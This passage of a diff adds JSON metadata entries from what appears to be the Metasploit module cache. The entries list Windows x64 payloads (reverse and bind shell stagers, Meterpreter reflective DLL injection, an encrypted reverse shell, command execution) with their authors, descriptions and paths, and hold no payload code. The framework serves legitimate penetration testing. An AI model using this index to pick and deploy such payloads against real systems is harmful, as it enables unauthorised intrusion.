Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/custom/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 
2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_windows/x64/custom/reverse_http": { + "name": "Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/x64/custom/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_windows/x64/custom/reverse_https": { + "name": "Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/x64/custom/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "agix", + "rwincey" + ], + "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + 
"notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_windows/x64/custom/reverse_named_pipe": { + "name": "Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/windows/x64/custom/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_windows/x64/custom/reverse_tcp": { + "name": "Windows shellcode stage, Windows x64 Reverse TCP Stager", + "fullname": "payload/windows/x64/custom/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "sf " + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/reverse_tcp", + "check": false, 
+ "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_windows/x64/custom/reverse_tcp_rc4": { + "name": "Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/custom/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_windows/x64/custom/reverse_tcp_uuid": { + "name": "Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/custom/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": 
"/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_windows/x64/custom/reverse_winhttp": { + "name": "Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/windows/x64/custom/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_windows/x64/custom/reverse_winhttps": { + "name": "Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/windows/x64/custom/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + 
"autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_windows/x64/encrypted_shell/reverse_tcp": { + "name": "Windows Command Shell, Encrypted Reverse TCP Stager", + "fullname": "payload/windows/x64/encrypted_shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Matt Graeber", + "Shelby Pace" + ], + "description": "Spawn a piped command shell (staged).\n\nConnect to MSF and read in stage", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/encrypted_shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/encrypted_shell", + "stager_refname": "windows/x64/encrypted_reverse_tcp" + }, + "payload_windows/x64/encrypted_shell_reverse_tcp": { + "name": "Windows Encrypted Reverse Shell", + "fullname": "payload/windows/x64/encrypted_shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Matt Graeber", + "Shelby Pace" + ], + "description": "Connect back to attacker and spawn an encrypted command shell", + "references": [], + "platform": 
"Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/encrypted_shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/exec": { + "name": "Windows x64 Execute Command", + "fullname": "payload/windows/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Execute an arbitrary command (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/exec.rb", + "is_install_path": true, + "ref_name": "windows/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/loadlibrary": { + "name": "Windows x64 LoadLibrary Path", + "fullname": "payload/windows/x64/loadlibrary", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "scriptjunkie", + "sf " + ], + "description": "Load an arbitrary x64 library path", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/loadlibrary.rb", + "is_install_path": true, + "ref_name": "windows/x64/loadlibrary", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/messagebox": { + "name": "Windows MessageBox x64", + "fullname": "payload/windows/x64/messagebox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "pasta " + ], + "description": "Spawn a dialog via MessageBox using a customizable title, text & icon", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/messagebox.rb", + "is_install_path": true, + "ref_name": "windows/x64/messagebox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/meterpreter/bind_ipv6_tcp": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/windows/x64/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_windows/x64/meterpreter/bind_ipv6_tcp_uuid": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_windows/x64/meterpreter/bind_named_pipe": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager", + "fullname": "payload/windows/x64/meterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "UserExistsError" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_windows/x64/meterpreter/bind_tcp": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager", + "fullname": "payload/windows/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_windows/x64/meterpreter/bind_tcp_rc4": { + "name": "Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/meterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_windows/x64/meterpreter/bind_tcp_uuid": { + "name": "Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_windows/x64/meterpreter/reverse_http": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/x64/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_windows/x64/meterpreter/reverse_https": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/x64/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "agix", + "rwincey" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_windows/x64/meterpreter/reverse_named_pipe": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/windows/x64/meterpreter/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_windows/x64/meterpreter/reverse_tcp": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager", + "fullname": "payload/windows/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_windows/x64/meterpreter/reverse_tcp_rc4": { + "name": "Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/meterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_windows/x64/meterpreter/reverse_tcp_uuid": { + "name": "Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_windows/x64/meterpreter/reverse_winhttp": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/windows/x64/meterpreter/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_windows/x64/meterpreter/reverse_winhttps": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/windows/x64/meterpreter/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_windows/x64/meterpreter_bind_named_pipe": { + "name": "Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", + "fullname": "payload/windows/x64/meterpreter_bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "UserExistsError", + "sf ", + "OJ Reeves" + ], + "description": "Connect to victim and spawn a Meterpreter shell. 
